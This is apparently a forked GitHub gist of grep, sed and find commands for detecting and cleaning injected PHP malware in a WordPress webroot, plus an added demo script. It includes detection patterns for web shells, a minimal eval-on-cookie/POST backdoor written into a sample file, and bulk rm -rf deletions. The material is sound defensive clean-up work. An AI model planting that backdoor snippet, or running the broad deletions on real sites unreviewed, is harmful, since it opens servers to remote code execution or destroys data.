@MisterDuval
Forked from frosit/infectedFiles.md
Last active March 9, 2022 21:45
Some commands for finding and clearing infected PHP files

Finding infected files with the following bash commands

Commands to list candidate infected files (the broad "eval" and "base64" patterns also hit legitimate code, so review the list before acting on it; quoting --include='*.php' keeps the shell from expanding the glob):

  • grep -lr --include='*.php' "eval(base64_decode" /path/to/webroot
  • grep -lr --include='*.php' "eval" .
  • grep -lr --include='*.php' "base64" .
  • grep -lr --include='*.php' '@include "\\' .
  • grep -lr --include='*.php' '@unserialize(@file_get_contents' .
  • grep -lr --include='*.php' '($_COOKIE, $_POST) as ' .
  • find /path/to/webroot -type f -name '*.ico'

The last command lists every .ico file, including the site's legitimate favicon. A backdoor hidden as an .ico (the target of the @include "\... pattern above) is a text file containing <?php, so check the contents (file, or grep -l '<?php') before treating a hit as malicious.

Commands to remove malicious code (each one changes files in bulk, so take a backup of the webroot first; for file names with spaces use grep -lrZ ... | xargs -0):

  • grep -lr --include='*.php' '($_COOKIE, $_POST) as ' . | xargs rm

    This deletes every file containing the pattern, not just the injected code, so check the list from the previous step before running it.

  • grep -lr --include='*.php' "eval(base64_decode" /path/to/webroot | xargs sed -i.bak 's/<?php eval(base64_decode[^;]*;/<?php\n/g'

    Replaces the injected statement with a bare <?php and keeps a .bak copy of each edited file (GNU sed; \n in the replacement is a GNU extension).

  • grep -lr --include='*.php' "eval(base64_decode" /path/to/webroot | xargs sed -i.bak '/eval(base64_decode/d'

    Deletes every line containing the call. If the file's original <?php tag shared that line it is deleted with it, which is what the "Missing <?php tag" step below repairs. (The pattern originally read "decode*", which only makes the trailing "e" optional; the shorter form matches the same lines.)

Trying to avoid re-appearance of this code injection: remove the rogue wp-phpmyadmin directory (a phpMyAdmin install does not belong inside the WordPress webroot; list the matches before piping them into rm -rf):

  • find /path/to/webroot -name "wp-phpmyadmin" -type d | xargs rm -rf

Missing <?php tag at the beginning (this happens when the line deletion above removed the opening tag together with the injected code; a PHP file without it is served as plain text):

  • find /var/www/ -name "index.php" | grep "/htdocs/index.php" | xargs grep -L "<?php" | xargs sed -i "1s/^/<?php \n/"

grep -L lists the files that do not contain <?php, and the sed prepends the tag as a new first line of each.

Extra newlines at the top (whitespace before <?php is sent to the client and breaks header() and session_start() calls):

  • find . -name '*.php' -exec sed -i '/./,$!d' '{}' \;

The one-liner originally listed here removes trailing blank lines at the end of each file instead, which is worth doing as well when the injection left blank lines after a closing ?>:

  • find . -name '*.php' -exec sed -i -e :a -e '/^\n*$/{$d;N;ba' -e '}' '{}' \;

Names containing "_input" are also removed; the pattern is broad enough to match legitimate files, so list the matches (find . -name '*_input*') before deleting them:

  • find . -name '*_input*' | xargs rm -rf
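The whole procedure above (scan, targeted removal of the injected statement, tag repair, blank-line cleanup, directory removal) as one added bash example that is not part of the original gist, run against a constructed sample webroot the script builds itself. It assumes GNU grep, sed, find and xargs (for -Z, --include, -i.bak, \n in replacements, -print0/-0 and -r); the sample paths (a/htdocs, b/htdocs), the base64 payload (it decodes to echo 1;) and every file body are made up for the demo. It goes beyond the gist in combining the indicators into one grep, using NUL-delimited pipes, snapshotting the webroot before editing and listing removal candidates instead of piping them straight into rm.

```shell
#!/usr/bin/env bash
# Added example, not part of the original gist: the scan and clean-up steps
# from this page as one NUL-safe pass with backups, run against a constructed
# sample webroot so the effect of each step can be checked. Assumes GNU
# grep/sed/find/xargs; every path and file body below is made up for the demo.
set -eu

# Constructed sample tree under $1: a clean file, a front controller with an
# injected eval(base64_decode(...)) prefix, a file with leading blank lines,
# a backdoor inside a rogue wp-phpmyadmin directory, a second vhost whose
# index.php lost its <?php, a binary favicon and a .ico that is really PHP.
make_sample_webroot() {
  local root="$1"
  mkdir -p "$root/a/htdocs/wp-content/uploads" "$root/a/htdocs/wp-phpmyadmin" "$root/b/htdocs"
  printf '<?php\necho "clean";\n' > "$root/a/htdocs/clean.php"
  printf '<?php eval(base64_decode("ZWNobyAxOw==")); ?>\n<?php\necho "home";\n' \
    > "$root/a/htdocs/index.php"
  printf '\n\n<?php\necho "spaced";\n' > "$root/a/htdocs/wp-content/spaced.php"
  printf '<?php\nforeach (array_merge($_COOKIE, $_POST) as $k => $v) { eval($v); }\n' \
    > "$root/a/htdocs/wp-phpmyadmin/index.php"
  printf 'echo "no tag";\n' > "$root/b/htdocs/index.php"
  head -c 64 /dev/zero > "$root/a/htdocs/favicon.ico"
  printf '<?php eval(base64_decode("ZWNobyAxOw=="));\n' > "$root/a/htdocs/wp-content/uploads/icon.ico"
}

# Count the NUL-terminated names the listers below emit.
count_nul() { tr -cd '\000' | wc -c; }

# Every .php file under $1 containing one of the gist's indicators: one
# fixed-string grep (-F keeps parentheses and the backslash literal) with
# NUL-terminated output so names with spaces survive the pipe.
list_suspects() {
  grep -rlZF --include='*.php' -e 'eval(base64_decode' \
    -e '@unserialize(@file_get_contents' -e '($_COOKIE, $_POST) as ' \
    -e '@include "\' "$1" || true
}

# A .ico is only suspicious if it contains PHP; a real favicon does not.
list_php_in_ico() {
  find "$1" -type f -name '*.ico' -exec grep -laZ '<?php' {} + || true
}

# Step 1: remove only the injected statement, keeping a .bak of each file.
# A closed "<?php eval(...); ?>" is dropped whole (its empty line goes in
# step 3); an unclosed one becomes a bare "<?php" so code that shared the
# line stays inside PHP.
strip_eval_statement() {
  grep -rlZ --include='*.php' 'eval(base64_decode' "$1" \
    | xargs -0 -r sed -i.bak -e 's/<?php eval(base64_decode[^;]*; *?>//g' \
                             -e 's/<?php eval(base64_decode[^;]*;/<?php\n/g'
}

# Step 2: a front controller without its opening tag is served as text;
# grep -L selects the files lacking "<?php" and sed puts it on line 1.
restore_open_tag() {
  find "$1" -path '*/htdocs/index.php' -type f -print0 \
    | xargs -0 -r grep -LZ '<?php' | xargs -0 -r sed -i.bak '1s/^/<?php\n/'
}

# Step 3: delete empty lines before the first non-empty one; output ahead
# of "<?php" breaks header() and session_start() on the live site.
strip_leading_blank_lines() {
  find "$1" -type f -name '*.php' -print0 | xargs -0 -r sed -i '/./,$!d'
}

# Step 4: the gist's rm -rf targets. Listing is separate from removing so
# the names can be reviewed; -prune reports a matched directory once.
list_removal_candidates() {
  find "$1" \( -type d -name 'wp-phpmyadmin' -o -name '*_input*' \) -prune -print0
}
remove_candidates() { list_removal_candidates "$1" | xargs -0 -r rm -rf --; }

# Full pass: snapshot the webroot, then the four steps in order (step 1
# must run before step 2 because it can strip a shared "<?php").
clean_webroot() {
  local root="${1%/}"
  tar -cf "$root.pre-clean.tar" -C "$root" .
  strip_eval_statement "$root"
  restore_open_tag "$root"
  strip_leading_blank_lines "$root"
  remove_candidates "$root"
}

main() {
  local tmp; tmp=$(mktemp -d)
  make_sample_webroot "$tmp/webroot"
  echo "suspect .php files before: $(list_suspects "$tmp/webroot" | count_nul)"
  echo ".ico files carrying PHP:   $(list_php_in_ico "$tmp/webroot" | count_nul)"
  clean_webroot "$tmp/webroot"
  echo "suspect .php files after:  $(list_suspects "$tmp/webroot" | count_nul)"
  rm -rf "$tmp"
}
main
```

Run it as-is to see the before/after counts on the sample tree. To use the functions on a real site, source the file and call list_suspects and list_removal_candidates on the webroot, review both lists, and only then call clean_webroot. The .ico files it reports are listed rather than removed, because the right action depends on what each file turns out to be.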
